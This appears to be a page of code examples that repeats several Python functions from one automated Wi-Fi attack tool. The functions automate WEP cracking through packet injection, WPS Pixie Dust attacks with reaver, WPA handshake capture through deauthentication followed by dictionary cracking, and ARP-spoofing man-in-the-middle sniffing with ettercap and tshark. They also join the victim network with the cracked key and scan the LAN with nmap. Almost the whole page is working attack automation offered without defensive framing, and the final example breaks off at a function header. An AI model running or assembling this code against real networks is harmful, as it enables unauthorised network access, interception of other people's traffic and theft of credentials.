Example #1
0
	def do_connect():
		nonlocal sock
		nonlocal tries
		info("Connecting to '{0}' with key '{1}'".format(essid, key if key is not None else ''))

		cmd_connect = pexpect.spawn('iwconfig {0} essid "{1}" key s:{2}'.format(iface, essid, key))
		cmd_connect.logfile = open(LOG_FILE, 'wb')
		cmd_connect.expect(['Error', pexpect.TIMEOUT, pexpect.EOF], 3)
		cmd_connect.close()
		parse_log_connect = open(LOG_FILE, 'r')
		for line in parse_log_connect:
			if line.find('Error') != -1:
				wpa_supplicant = open('/etc/wpa_supplicant/wpa_supplicant.conf', 'w')
				wpa_supplicant.write('ctrl_interface=/var/run/wpa_supplicant\n')
				wpa_supplicant.write('network={\n')
				wpa_supplicant.write('ssid="' + essid + '"\n')
				wpa_supplicant.write('key_mgmt=WPA-PSK\n')
				wpa_supplicant.write('psk="' + key.strip() + '"\n')
				wpa_supplicant.write('}')
				wpa_supplicant.close()
				call(['ifconfig', iface, 'down'], stdout=DN, stderr=DN)
				call(['dhclient', iface, '-r'], stdout=DN, stderr=DN)
				call(['ifconfig', iface, 'up'], stdout=DN, stderr=DN)
				call(['iwconfig', iface, 'mode', 'managed'])
				call(['killall', 'wpa_supplicant'], stdout=DN, stderr=DN)
				call(['wpa_supplicant', '-B', '-c', '/etc/wpa_supplicant/wpa_supplicant.conf', '-i', iface], stdout=DN,
					stderr=DN)
				time.sleep(2)
		parse_log_connect.close()
		os.remove(LOG_FILE)
		tries += 1
		call(['dhclient', iface], stdout=DN, stderr=DN)
		time.sleep(4)
Example #2
0
	def do_connect():
		nonlocal sock
		nonlocal tries
		info("Connecting to '{0}' with key '{1}'".format(settings.TARGET_ESSID, settings.TARGET_KEY if settings.TARGET_KEY is not None else ''))

		cmd_connect = pexpect.spawn('iwconfig {0} essid "{1}" key s:{2}'.format(settings.INTERFACE, settings.TARGET_ESSID, settings.TARGET_KEY))
		cmd_connect.logfile = open(settings.LOG_FILE, 'wb')
		cmd_connect.expect(['Error', pexpect.TIMEOUT, pexpect.EOF], 3)
		cmd_connect.close()
		parse_log_connect = open(settings.LOG_FILE, 'r')
		for line in parse_log_connect:
			if line.find('Error') != -1:
				wpa_supplicant = open('/etc/wpa_supplicant/wpa_supplicant.conf', 'w')
				wpa_supplicant.write('ctrl_interface=/var/run/wpa_supplicant\n')
				wpa_supplicant.write('network={\n')
				wpa_supplicant.write('ssid="' + settings.TARGET_ESSID + '"\n')
				wpa_supplicant.write('key_mgmt=WPA-PSK\n')
				wpa_supplicant.write('psk="' + settings.TARGET_KEY.strip() + '"\n')
				wpa_supplicant.write('}')
				wpa_supplicant.close()
				subprocess.call(['ifconfig', settings.INTERFACE, 'down'], stdout=subprocess.DEVNULL, stderr=subprocess.DEVNULL)
				subprocess.call(['dhclient', settings.INTERFACE, '-r'], stdout=subprocess.DEVNULL, stderr=subprocess.DEVNULL)
				subprocess.call(['ifconfig', settings.INTERFACE, 'up'], stdout=subprocess.DEVNULL, stderr=subprocess.DEVNULL)
				subprocess.call(['iwconfig', settings.INTERFACE, 'mode', 'managed'])
				subprocess.call(['killall', 'wpa_supplicant'], stdout=subprocess.DEVNULL, stderr=subprocess.DEVNULL)
				subprocess.call(['wpa_supplicant', '-B', '-c', '/etc/wpa_supplicant/wpa_supplicant.conf', '-i', settings.INTERFACE], stdout=subprocess.DEVNULL,
					stderr=subprocess.DEVNULL)
				time.sleep(2)
		parse_log_connect.close()
		os.remove(settings.LOG_FILE)
		tries += 1
		subprocess.call(['dhclient', settings.INTERFACE], stdout=subprocess.DEVNULL, stderr=subprocess.DEVNULL)
		time.sleep(4)
Example #3
0
    def do_connect():
        nonlocal sock
        nonlocal tries
        info("Connecting to '{0}' with key '{1}'".format(
            settings.TARGET_ESSID,
            settings.TARGET_KEY if settings.TARGET_KEY is not None else ''))
        report.saveLog("Connecting to '{0}' with key '{1}'".format(
            settings.TARGET_ESSID,
            settings.TARGET_KEY if settings.TARGET_KEY is not None else ''))

        cmd_connect = pexpect.spawn(
            'iwconfig {0} essid "{1}" key s:{2}'.format(
                settings.INTERFACE, settings.TARGET_ESSID,
                settings.TARGET_KEY))
        cmd_connect.logfile = open(settings.LOG_FILE, 'wb')
        cmd_connect.expect(['Error', pexpect.TIMEOUT, pexpect.EOF], 3)
        cmd_connect.close()
        parse_log_connect = open(settings.LOG_FILE, 'r')
        for line in parse_log_connect:
            if 'Error' in line:
                wpa_supplicant = open(
                    '/etc/wpa_supplicant/wpa_supplicant.conf', 'w')
                wpa_supplicant.write(
                    'ctrl_interface=/var/run/wpa_supplicant\n')
                wpa_supplicant.write('network={\n')
                wpa_supplicant.write('ssid="' + settings.TARGET_ESSID + '"\n')
                wpa_supplicant.write('key_mgmt=WPA-PSK\n')
                wpa_supplicant.write('psk="' + settings.TARGET_KEY.strip() +
                                     '"\n')
                wpa_supplicant.write('}')
                wpa_supplicant.close()
                subprocess.call(['ifconfig', settings.INTERFACE, 'down'],
                                stdout=subprocess.DEVNULL,
                                stderr=subprocess.DEVNULL)
                subprocess.call(['dhclient', settings.INTERFACE, '-r'],
                                stdout=subprocess.DEVNULL,
                                stderr=subprocess.DEVNULL)
                subprocess.call(['ifconfig', settings.INTERFACE, 'up'],
                                stdout=subprocess.DEVNULL,
                                stderr=subprocess.DEVNULL)
                subprocess.call(
                    ['iwconfig', settings.INTERFACE, 'mode', 'managed'])
                subprocess.call(['killall', 'wpa_supplicant'],
                                stdout=subprocess.DEVNULL,
                                stderr=subprocess.DEVNULL)
                subprocess.call([
                    'wpa_supplicant', '-B', '-c',
                    '/etc/wpa_supplicant/wpa_supplicant.conf', '-i',
                    settings.INTERFACE
                ],
                                stdout=subprocess.DEVNULL,
                                stderr=subprocess.DEVNULL)
                time.sleep(2)
        parse_log_connect.close()
        os.remove(settings.LOG_FILE)
        tries += 1
        subprocess.call(['dhclient', settings.INTERFACE],
                        stdout=subprocess.DEVNULL,
                        stderr=subprocess.DEVNULL)
        time.sleep(4)
    def run(self):
        proc_airodump = subprocess.Popen([
            'airodump-ng', '--bssid', settings.TARGET_BSSID, '-c',
            settings.TARGET_CHANNEL, '-w', 'cr0z0n0_attack',
            settings.INTERFACE_MON
        ],
                                         stdout=subprocess.DEVNULL,
                                         stderr=subprocess.DEVNULL)

        info("Running an association & packet injection attack")
        cmd_auth = pexpect.spawn(
            'aireplay-ng -1 0 -e "{0}" -a {1} -h {2} {3}'.format(
                settings.TARGET_ESSID, settings.TARGET_BSSID, settings.NEW_MAC,
                settings.INTERFACE_MON))
        cmd_auth.logfile = open(settings.LOG_FILE, 'wb')
        cmd_auth.expect(
            ['Association successful', pexpect.TIMEOUT, pexpect.EOF], 20)
        cmd_auth.close()
        parse_log_auth = open(settings.LOG_FILE, 'r')
        for line in parse_log_auth:
            if line.find('Association successful') != -1:
                info("Association successful :-) injecting packets...")
        parse_log_auth.close()
        os.remove(settings.LOG_FILE)

        proc_aireplay = subprocess.Popen([
            'aireplay-ng', '-3', '-e', '"' + settings.TARGET_ESSID + '"', '-b',
            settings.TARGET_BSSID, '-h', settings.NEW_MAC,
            settings.INTERFACE_MON
        ],
                                         stdout=subprocess.DEVNULL,
                                         stderr=subprocess.DEVNULL)

        time.sleep(settings.WEP_AIREPLAY_TIME)

        cmd_crack = pexpect.spawn('aircrack-ng cr0z0n0_attack-01.cap')
        cmd_crack.logfile = open(settings.LOG_FILE, 'wb')
        cmd_crack.expect(
            ['KEY FOUND!', 'Failed', pexpect.TIMEOUT, pexpect.EOF], 30)
        cmd_crack.close()

        parse_log_crack = open(settings.LOG_FILE, 'r')
        for line in parse_log_crack:
            wh = line.find('KEY FOUND!')
            if wh > -1:
                if 'ASCII' in line:
                    wh2 = line.find('ASCII')
                    key_start = 'ASCII('
                    key_end = line.find(')')
                    settings.TARGET_KEY = line[wh2 + len(key_start):key_end]
                else:
                    key_start = 'KEY FOUND!'
                    key_end = line.find(']')
                    settings.TARGET_KEY = line[wh +
                                               len(key_start):key_end].strip(
                                               )  # 13 (?)
        parse_log_crack.close()
        os.remove(settings.LOG_FILE)
        if settings.TARGET_KEY is None:
            warn("Attack failed!")
Example #5
0
 def run(self):
     info("Running NMap -O -sV scan...")
     subprocess.call([
         'nmap', '-oN', 'cr0z0n0_nmap', '--exclude', settings.IP_LAN,
         settings.LAN_RANGE
     ],
                     stderr=subprocess.DEVNULL)
Example #6
0
    def run(self):
        info("Running Pixie Dust attack...")
        report.saveLog("Running Pixie Dust attack...")
        cmd_reaver = pexpect.spawn(
            'reaver -i {0} -c {1} -b {2} -vv -K 1'.format(
                settings.INTERFACE_MON, settings.TARGET_CHANNEL,
                settings.TARGET_BSSID))
        cmd_reaver.logfile = open(settings.LOG_FILE, 'wb')
        cmd_reaver.expect(
            ['WPA PSK:', 'WPS pin not found!', pexpect.TIMEOUT, pexpect.EOF],
            30)
        cmd_reaver.close()

        parse_log_crack = open(settings.LOG_FILE, 'r')
        for line in parse_log_crack:
            if 'WPA PSK:' in line:
                key_reg = re.split("('.*?')|(\".*?\")", line)
                key_filter = key_reg[1].replace("'", "")
                settings.TARGET_KEY = key_filter
                break
        parse_log_crack.close()
        os.remove(settings.LOG_FILE)
        if settings.TARGET_KEY is None:
            warn("Pixie Dust attack failed!")
            report.saveLog("Pixie Dust attack failed!")
Example #7
0
    def run(self):
        proc_airodump = subprocess.Popen([
            'airodump-ng', '--bssid', settings.TARGET_BSSID, '-c',
            settings.TARGET_CHANNEL, '-w', 'PPDRON_attack',
            settings.INTERFACE_MON
        ],
                                         stdout=subprocess.DEVNULL,
                                         stderr=subprocess.DEVNULL)

        info(
            "Trying to get the handshake (sending deauthentication packets...)"
        )
        report.saveLog(
            "Trying to get the handshake (sending deauthentication packets...)"
        )
        cmd_aireplay = pexpect.spawn('aireplay-ng -0 10 -a {0} {1}'.format(
            settings.TARGET_BSSID, settings.INTERFACE_MON))
        time.sleep(10)
        cmd_aireplay.close()
        time.sleep(settings.WPA_EXPECT_HANDSHAKE_TIME)

        cmd_pyrit = pexpect.spawn('pyrit -r PPDRON_attack-01.cap analyze')
        cmd_pyrit.logfile = open(settings.LOG_FILE, 'wb')
        cmd_pyrit.expect(['No valid', 'good', pexpect.TIMEOUT, pexpect.EOF])
        cmd_pyrit.close()

        handshake = True
        parse_log_pyrit = open(settings.LOG_FILE, 'r')
        for line in parse_log_pyrit:
            if "No valid" in line:
                warn("We couldn't get the handshake :-(")
                report.saveLog("We couldn't get the handshake :-(")
                handshake = False
        parse_log_pyrit.close()
        os.remove(settings.LOG_FILE)

        if handshake != False:
            info("We have something :-) Making a dictionary attack...")
            report.saveLog(
                "We have something :-) Making a dictionary attack...")
            cmd_crack = pexpect.spawn(
                'aircrack-ng -w dictionary_wpa2 PPDRON_attack-01.cap')
            cmd_crack.logfile = open(settings.LOG_FILE, 'wb')
            cmd_crack.expect(
                ['KEY FOUND!', 'Failed', pexpect.TIMEOUT, pexpect.EOF])
            cmd_crack.close()

            parse_log_crack = open(settings.LOG_FILE, 'r')
            for line in parse_log_crack:
                wh = line.find('KEY FOUND!')
                if wh > -1:
                    key_end = line.find(']')
                    settings.TARGET_KEY = line[wh + 13:key_end]
                    break
            parse_log_crack.close()
            os.remove(settings.LOG_FILE)
            if settings.TARGET_KEY is None:
                warn("Dictionary attack failed!")
                report.saveLog("Dictionary attack failed!")
Example #8
0
def WEP_attack(essid, bssid, channel, new_mac, iface_mon):
    #Delete old files:
    if os.path.exists(OS_PATH + '/cr0z0n0_attack-01.csv'):
        os.remove(OS_PATH + '/cr0z0n0_attack-01.csv')
        os.remove(OS_PATH + '/cr0z0n0_attack-01.cap')
        os.remove(OS_PATH + '/cr0z0n0_attack-01.kismet.csv')
        os.remove(OS_PATH + '/cr0z0n0_attack-01.kismet.netxml')

    proc_airodump = Popen([
        'airodump-ng', '--bssid', bssid, '-c', channel, '-w', 'cr0z0n0_attack',
        iface_mon
    ],
                          stdout=DN,
                          stderr=DN)

    cmd_auth = pexpect.spawn(
        'aireplay-ng -1 0 -e "{0}" -a {1} -h {2} {3}'.format(
            essid, bssid, new_mac, iface_mon))
    cmd_auth.logfile = open(LOG_FILE, 'wb')
    cmd_auth.expect(['Association successful', pexpect.TIMEOUT, pexpect.EOF],
                    20)
    cmd_auth.close()
    parse_log_auth = open(LOG_FILE, 'r')
    for line in parse_log_auth:
        if line.find('Association successful') != -1:
            info("Association successful")
    parse_log_auth.close()
    os.remove(LOG_FILE)

    proc_aireplay = Popen([
        'aireplay-ng', '-3', '-e', '"' + essid + '"', '-b', bssid, '-h',
        new_mac, iface_mon
    ],
                          stdout=DN,
                          stderr=DN)

    time.sleep(WEP_AIREPLAY_TIME)

    cmd_crack = pexpect.spawn('aircrack-ng cr0z0n0_attack-01.cap')
    cmd_crack.logfile = open(LOG_FILE, 'wb')
    cmd_crack.expect(['KEY FOUND!', 'Failed', pexpect.TIMEOUT, pexpect.EOF],
                     30)
    cmd_crack.close()
    key_found = False
    parse_log_crack = open(LOG_FILE, 'r')
    for line in parse_log_crack:
        where = line.find('KEY FOUND!')
        if where > -1:
            if line.find('ASCII') != -1:
                where2 = line.find('ASCII')
                key_end = line.find(')')
                key_found = line[where2 + 6:key_end]
            else:
                key_end = line.find(']')
                key_found = line[where + 13:key_end]
    parse_log_crack.close()
    os.remove(LOG_FILE)

    return key_found
Example #9
0
def run():
	settings.TARGET_MITM = get_target_mitm()
	info("Executing MITM and Sniffing attacks between {g} and {m}...".format(g=settings.GATEWAY, m=settings.TARGET_MITM))
	cmd_ettercap = pexpect.spawn(
				'ettercap -T -M arp:remote /{g}/ /{m}/ -i {i}'.format(g=settings.GATEWAY, m=settings.TARGET_MITM, i=settings.INTERFACE))
	time.sleep(2)
	# cmd_tshark = pexpect.spawn('tshark -i {i} -w cr0z0n0_sniff'.format(i=settings.INTERFACE))
	proc = subprocess.call(["tshark", "-i", settings.INTERFACE], stderr=subprocess.DEVNULL)
Example #10
0
def connect(essid, key, iface_mon=None):
	import fcntl
	import struct
	sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
	tries = 0

	if iface_mon is not None:
			call(['airmon-ng', 'stop', iface_mon], stdout=DN, stderr=DN)
			time.sleep(1)

	iface = get_ifaces()[0]

	def do_connect():
		nonlocal sock
		nonlocal tries
		info("Connecting to '{0}' with key '{1}'".format(essid, key if key is not None else ''))

		cmd_connect = pexpect.spawn('iwconfig {0} essid "{1}" key s:{2}'.format(iface, essid, key))
		cmd_connect.logfile = open(LOG_FILE, 'wb')
		cmd_connect.expect(['Error', pexpect.TIMEOUT, pexpect.EOF], 3)
		cmd_connect.close()
		parse_log_connect = open(LOG_FILE, 'r')
		for line in parse_log_connect:
			if line.find('Error') != -1:
				wpa_supplicant = open('/etc/wpa_supplicant/wpa_supplicant.conf', 'w')
				wpa_supplicant.write('ctrl_interface=/var/run/wpa_supplicant\n')
				wpa_supplicant.write('network={\n')
				wpa_supplicant.write('ssid="' + essid + '"\n')
				wpa_supplicant.write('key_mgmt=WPA-PSK\n')
				wpa_supplicant.write('psk="' + key.strip() + '"\n')
				wpa_supplicant.write('}')
				wpa_supplicant.close()
				call(['ifconfig', iface, 'down'], stdout=DN, stderr=DN)
				call(['dhclient', iface, '-r'], stdout=DN, stderr=DN)
				call(['ifconfig', iface, 'up'], stdout=DN, stderr=DN)
				call(['iwconfig', iface, 'mode', 'managed'])
				call(['killall', 'wpa_supplicant'], stdout=DN, stderr=DN)
				call(['wpa_supplicant', '-B', '-c', '/etc/wpa_supplicant/wpa_supplicant.conf', '-i', iface], stdout=DN,
					stderr=DN)
				time.sleep(2)
		parse_log_connect.close()
		os.remove(LOG_FILE)
		tries += 1
		call(['dhclient', iface], stdout=DN, stderr=DN)
		time.sleep(4)

	do_connect()
	if get_current_essid(iface) != essid and tries < 5:
		warn('Connection to {e} failed. Retrying.'.format(e=essid))
		do_connect()
	if get_current_essid(iface) == essid:
		ipaddr = socket.inet_ntoa(
				fcntl.ioctl(sock.fileno(), 0x8915, struct.pack('256s', bytes(iface[:15], 'utf-8')))[20:24])
		info('Connection to {e} succeeded! Our IP is: {i}'.format(e=essid, i=ipaddr))
		return ipaddr
	else:
		error('Could not connect to {e} after 5 tries. Aborting'.format(e=essid))
		exit(1)
Example #11
0
def run():
    if os.path.exists(settings.OS_PATH + '/cr0z0n0_attack-01.csv'):
        os.remove(settings.OS_PATH + '/cr0z0n0_attack-01.csv')
        os.remove(settings.OS_PATH + '/cr0z0n0_attack-01.cap')
        os.remove(settings.OS_PATH + '/cr0z0n0_attack-01.kismet.csv')
        os.remove(settings.OS_PATH + '/cr0z0n0_attack-01.kismet.netxml')

    proc_airodump = subprocess.Popen([
        'airodump-ng', '--bssid', settings.TARGET_BSSID, '-c',
        settings.TARGET_CHANNEL, '-w', 'cr0z0n0_attack', settings.INTERFACE_MON
    ],
                                     stdout=subprocess.DEVNULL,
                                     stderr=subprocess.DEVNULL)

    cmd_auth = pexpect.spawn(
        'aireplay-ng -1 0 -e "{0}" -a {1} -h {2} {3}'.format(
            settings.TARGET_ESSID, settings.TARGET_BSSID, settings.NEW_MAC,
            settings.INTERFACE_MON))
    cmd_auth.logfile = open(settings.LOG_FILE, 'wb')
    cmd_auth.expect(['Association successful', pexpect.TIMEOUT, pexpect.EOF],
                    20)
    cmd_auth.close()
    parse_log_auth = open(settings.LOG_FILE, 'r')
    for line in parse_log_auth:
        if line.find('Association successful') != -1:
            info("Association successful")
    parse_log_auth.close()
    os.remove(settings.LOG_FILE)

    proc_aireplay = subprocess.Popen([
        'aireplay-ng', '-3', '-e', '"' + settings.TARGET_ESSID + '"', '-b',
        settings.TARGET_BSSID, '-h', settings.NEW_MAC, settings.INTERFACE_MON
    ],
                                     stdout=subprocess.DEVNULL,
                                     stderr=subprocess.DEVNULL)

    time.sleep(settings.WEP_AIREPLAY_TIME)

    cmd_crack = pexpect.spawn('aircrack-ng cr0z0n0_attack-01.cap')
    cmd_crack.logfile = open(settings.LOG_FILE, 'wb')
    cmd_crack.expect(['KEY FOUND!', 'Failed', pexpect.TIMEOUT, pexpect.EOF],
                     30)
    cmd_crack.close()

    parse_log_crack = open(settings.LOG_FILE, 'r')
    for line in parse_log_crack:
        where = line.find('KEY FOUND!')
        if where > -1:
            if line.find('ASCII') != -1:
                where2 = line.find('ASCII')
                key_end = line.find(')')
                settings.TARGET_KEY = line[where2 + 6:key_end]
            else:
                key_end = line.find(']')
                settings.TARGET_KEY = line[where + 13:key_end]
    parse_log_crack.close()
    os.remove(settings.LOG_FILE)
Example #12
0
def connect_to_lan():
	import fcntl
	import struct
	sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
	tries = 0

	if settings.INTERFACE_MON is not None:
			device_mgr.toggle_mode_monitor(False)
			time.sleep(1)

	def do_connect():
		nonlocal sock
		nonlocal tries
		info("Connecting to '{0}' with key '{1}'".format(settings.TARGET_ESSID, settings.TARGET_KEY if settings.TARGET_KEY is not None else ''))

		cmd_connect = pexpect.spawn('iwconfig {0} essid "{1}" key s:{2}'.format(settings.INTERFACE, settings.TARGET_ESSID, settings.TARGET_KEY))
		cmd_connect.logfile = open(settings.LOG_FILE, 'wb')
		cmd_connect.expect(['Error', pexpect.TIMEOUT, pexpect.EOF], 3)
		cmd_connect.close()
		parse_log_connect = open(settings.LOG_FILE, 'r')
		for line in parse_log_connect:
			if line.find('Error') != -1:
				wpa_supplicant = open('/etc/wpa_supplicant/wpa_supplicant.conf', 'w')
				wpa_supplicant.write('ctrl_interface=/var/run/wpa_supplicant\n')
				wpa_supplicant.write('network={\n')
				wpa_supplicant.write('ssid="' + settings.TARGET_ESSID + '"\n')
				wpa_supplicant.write('key_mgmt=WPA-PSK\n')
				wpa_supplicant.write('psk="' + settings.TARGET_KEY.strip() + '"\n')
				wpa_supplicant.write('}')
				wpa_supplicant.close()
				subprocess.call(['ifconfig', settings.INTERFACE, 'down'], stdout=subprocess.DEVNULL, stderr=subprocess.DEVNULL)
				subprocess.call(['dhclient', settings.INTERFACE, '-r'], stdout=subprocess.DEVNULL, stderr=subprocess.DEVNULL)
				subprocess.call(['ifconfig', settings.INTERFACE, 'up'], stdout=subprocess.DEVNULL, stderr=subprocess.DEVNULL)
				subprocess.call(['iwconfig', settings.INTERFACE, 'mode', 'managed'])
				subprocess.call(['killall', 'wpa_supplicant'], stdout=subprocess.DEVNULL, stderr=subprocess.DEVNULL)
				subprocess.call(['wpa_supplicant', '-B', '-c', '/etc/wpa_supplicant/wpa_supplicant.conf', '-i', settings.INTERFACE], stdout=subprocess.DEVNULL,
					stderr=subprocess.DEVNULL)
				time.sleep(2)
		parse_log_connect.close()
		os.remove(settings.LOG_FILE)
		tries += 1
		subprocess.call(['dhclient', settings.INTERFACE], stdout=subprocess.DEVNULL, stderr=subprocess.DEVNULL)
		time.sleep(4)

	do_connect()
	if get_current_essid() != settings.TARGET_ESSID and tries < 5:
		warn('Connection to {e} failed. Retrying.'.format(e=settings.TARGET_ESSID))
		do_connect()
	if get_current_essid() == settings.TARGET_ESSID:
		ipaddr = socket.inet_ntoa(
				fcntl.ioctl(sock.fileno(), 0x8915, struct.pack('256s', bytes(settings.INTERFACE[:15], 'utf-8')))[20:24])
		info('Connection to {e} succeeded! Our IP is: {i}'.format(e=settings.TARGET_ESSID, i=ipaddr))
		settings.IP_LAN = ipaddr.strip()
	else:
		error('Could not connect to {e} after 5 tries. Aborting'.format(e=settings.TARGET_ESSID))
		exit(1)
def run():
    settings.TARGET_MITM = get_target_mitm()
    info("Executing MITM and Sniffing attacks between {g} and {m}...".format(
        g=settings.GATEWAY, m=settings.TARGET_MITM))
    cmd_ettercap = pexpect.spawn(
        'ettercap -T -M arp:remote /{g}/ /{m}/ -i {i}'.format(
            g=settings.GATEWAY, m=settings.TARGET_MITM, i=settings.INTERFACE))
    time.sleep(2)
    # cmd_tshark = pexpect.spawn('tshark -i {i} -w cr0z0n0_sniff'.format(i=settings.INTERFACE))
    proc = subprocess.call(["tshark", "-i", settings.INTERFACE],
                           stderr=subprocess.DEVNULL)
Example #14
0
def scan_targets(iface_mon, essid=None):
    """
	Scans the surrounding networks for a predefined amount of time.
	Orders the found APs by power, and then returns the one with most IV captured (or the specified network in the essid parameter)
	The AP is represented by a dict, in the form:
		{'Privacy': 'WPA2 WPA', 'Authentication': 'PSK', 'channel': '1', 'ESSID': 'The Beardhouse', 'LAN IP': '0.  0.  0.  0', 'First time seen': '2015-12-15 04:10:22', 'Speed': '54', 'IV': '0', 'beacons': '25', 'ID-length': '14', 'Cipher': 'CCMP TKIP', 'Power': '-63', 'Last time seen': '2015-12-15 04:10:31', 'Key': '', 'BSSID': '38:60:77:A4:68:A1'}
	Notice that the keys are mapped to airodump-ng column names, EXCEPT for 'beacons' and 'IV'
	"""
    import csv
    info("Scanning {t} seconds for target WiFi access points...".format(
        t=AIRODUMP_SCAN_TIME))
    #  Delete old files:
    if os.path.exists(OS_PATH + '/cr0z0n0-01.csv'):
        os.remove(OS_PATH + '/cr0z0n0-01.csv')
        os.remove(OS_PATH + '/cr0z0n0-01.cap')
        os.remove(OS_PATH + '/cr0z0n0-01.kismet.csv')
        os.remove(OS_PATH + '/cr0z0n0-01.kismet.netxml')

    cmd_airodump = pexpect.spawn(
        'airodump-ng -w cr0z0n0 {0}'.format(iface_mon))
    cmd_airodump.expect([pexpect.TIMEOUT, pexpect.EOF], AIRODUMP_SCAN_TIME)
    cmd_airodump.close()

    with open(OS_PATH + '/cr0z0n0-01.csv', 'r') as f:
        f.readline()  # skip empty line
        header = list(f.readline().split(', '))
        header = list(map(lambda x: x.replace('# ', '').strip(),
                          header))  # cleanup
        d = csv.DictReader(f,
                           delimiter=',',
                           skipinitialspace=True,
                           fieldnames=header)
        aps = []
        for e in d:
            if e.get('Power') is not None:
                aps.append(e)
            else:
                #  Nearing the end, there's the stations list,
                #  for which we don't care right now
                break
        if len(aps) == 0:
            error("No WiFi networks in range! Nothing we can do.")
            exit(1)
        if essid is None:
            for ap in aps:
                if ap.get('ESSID').find('00') != -1:
                    aps.remove(ap)
            aps = sorted(aps, key=lambda x: x.get('Power'))
            # From the top 2, get the one with most IV
            return sorted(aps[:2], key=lambda x: x.get('IV'), reverse=True)[0]
        else:
            for ap in aps:
                if ap.get('ESSID') == essid:
                    return ap
 def run(self):
     info(
         "Running a Sniffing and MITM attack between {g} and {m}...".format(
             g=settings.GATEWAY, m=settings.TARGET_MITM))
     cmd_ettercap = pexpect.spawn(
         'ettercap -T -M arp:remote /{g}/ /{m}/ -i {i}'.format(
             g=settings.GATEWAY,
             m=settings.TARGET_MITM,
             i=settings.INTERFACE))
     time.sleep(2)
     # cmd_tshark = pexpect.spawn('tshark -i {i} -w cr0z0n0_sniff'.format(i=settings.INTERFACE)) # backup (?)
     proc = subprocess.call(["tshark", "-i", settings.INTERFACE],
                            stderr=subprocess.DEVNULL)
Example #16
0
def scan_targets(iface_mon, essid=None):
	"""
	Scans the surrounding networks for a predefined amount of time.
	Orders the found APs by power, and then returns the one with most IV captured (or the specified network in the essid parameter)
	The AP is represented by a dict, in the form:
		{'Privacy': 'WPA2 WPA', 'Authentication': 'PSK', 'channel': '1', 'ESSID': 'The Beardhouse', 'LAN IP': '0.  0.  0.  0', 'First time seen': '2015-12-15 04:10:22', 'Speed': '54', 'IV': '0', 'beacons': '25', 'ID-length': '14', 'Cipher': 'CCMP TKIP', 'Power': '-63', 'Last time seen': '2015-12-15 04:10:31', 'Key': '', 'BSSID': '38:60:77:A4:68:A1'}
	Notice that the keys are mapped to airodump-ng column names, EXCEPT for 'beacons' and 'IV'
	:param iface_mon: Monitoring interface with which to scan
	:param essid: If supplied, it gets the airodump information for this particular ESSID
	"""
	import csv
	info("Scanning {t} seconds for target WiFi access points...".format(t=AIRODUMP_SCAN_TIME))
	#  Delete old files:
	if os.path.exists(OS_PATH + '/cr0z0n0-01.csv'):
		os.remove(OS_PATH + '/cr0z0n0-01.csv')
		os.remove(OS_PATH + '/cr0z0n0-01.cap')
		os.remove(OS_PATH + '/cr0z0n0-01.kismet.csv')
		os.remove(OS_PATH + '/cr0z0n0-01.kismet.netxml')

	cmd_airodump = pexpect.spawn('airodump-ng -w cr0z0n0 {0}'.format(iface_mon))
	cmd_airodump.expect([pexpect.TIMEOUT, pexpect.EOF], AIRODUMP_SCAN_TIME)
	cmd_airodump.close()

	with open(OS_PATH + '/cr0z0n0-01.csv', 'r') as f:
		f.readline()  # skip empty line
		header = list(f.readline().split(', '))
		header = list(map(lambda x: x.replace('# ', '').strip(), header))  # cleanup
		d = csv.DictReader(f, delimiter=',', skipinitialspace=True, fieldnames=header)
		aps = []
		for e in d:
			if e.get('Power') is not None:
				aps.append(e)
			else:
				#  Nearing the end, there's the stations list,
				#  for which we don't care right now
				break
		if len(aps) == 0:
			error("No WiFi networks in range! Nothing we can do.")
			exit(1)
		if essid is None:
			for ap in aps:
				if ap.get('ESSID').find('00') != -1:
					aps.remove(ap)
			aps = sorted(aps, key=lambda x: x.get('Power'))
			# From the top 2, get the one with most IV
			return sorted(aps[:2], key=lambda x: x.get('IV'), reverse=True)[0]
		else:
			for ap in aps:
				if ap.get('ESSID') == essid:
					return ap
Example #17
0
def pixiedust():
    info("Trying PixieDust attack")
    cmd_reaver = pexpect.spawn(
        'reaver -i {0} -c {1} -b {2} -s n -K 1 -vv'.format(
            settings.INTERFACE_MON, settings.TARGET_CHANNEL,
            settings.TARGET_BSSID))
    cmd_reaver.logfile = open(settings.LOG_FILE, 'wb')
    cmd_reaver.expect(['WPS pin not found!', pexpect.TIMEOUT, pexpect.EOF], 30)
    cmd_reaver.close()

    parse_log_crack = open(settings.LOG_FILE, 'r')
    for line in parse_log_crack:
        if line.find('WPA PSK: ') != -1:
            settings.TARGET_KEY = line[line.find("WPA PSK: '") + 10:-1]
    parse_log_crack.close()
    os.remove(settings.LOG_FILE)
Example #18
0
    def do_connect():
        nonlocal sock
        nonlocal tries
        info("Connecting to '{0}' with key '{1}'".format(
            essid, key if key is not None else ''))
        if iface_mon is not None:
            call(['airmon-ng', 'stop', iface_mon], stdout=DN, stderr=DN)
            time.sleep(1)  # TODO: Necessary? - yep for Raspbian.

        cmd_connect = pexpect.spawn(
            'iwconfig {0} essid "{1}" key s:{2}'.format(iface, essid, key))
        cmd_connect.logfile = open(LOG_FILE, 'wb')
        cmd_connect.expect(['Error', pexpect.TIMEOUT, pexpect.EOF], 3)
        cmd_connect.close()
        parse_log_connect = open(LOG_FILE, 'r')
        for line in parse_log_connect:
            if line.find('Error') != -1:
                wpa_supplicant = open(
                    '/etc/wpa_supplicant/wpa_supplicant.conf', 'w')
                wpa_supplicant.write(
                    'ctrl_interface=/var/run/wpa_supplicant\n')
                wpa_supplicant.write('network={\n')
                wpa_supplicant.write('ssid="' + essid + '"\n')
                wpa_supplicant.write(
                    'key_mgmt=WPA-PSK\n'
                )  # TODO: Always wpa-psk? - No problem yet.
                wpa_supplicant.write('psk="' + key.strip() + '"\n')
                wpa_supplicant.write('}')
                wpa_supplicant.close()
                call(['ifconfig', iface, 'down'], stdout=DN, stderr=DN)
                call(['dhclient', iface, '-r'], stdout=DN, stderr=DN)
                call(['ifconfig', iface, 'up'], stdout=DN, stderr=DN)
                call(['iwconfig', iface, 'mode', 'managed'])
                call(['killall', 'wpa_supplicant'], stdout=DN, stderr=DN)
                call([
                    'wpa_supplicant', '-B', '-c',
                    '/etc/wpa_supplicant/wpa_supplicant.conf', '-i', iface
                ],
                     stdout=DN,
                     stderr=DN)
                time.sleep(2)
        parse_log_connect.close()
        os.remove(LOG_FILE)
        tries += 1
        call(['dhclient', iface], stdout=DN, stderr=DN)
        time.sleep(4)
Example #19
0
def wep_attack(essid, bssid, channel, new_mac, iface_mon):
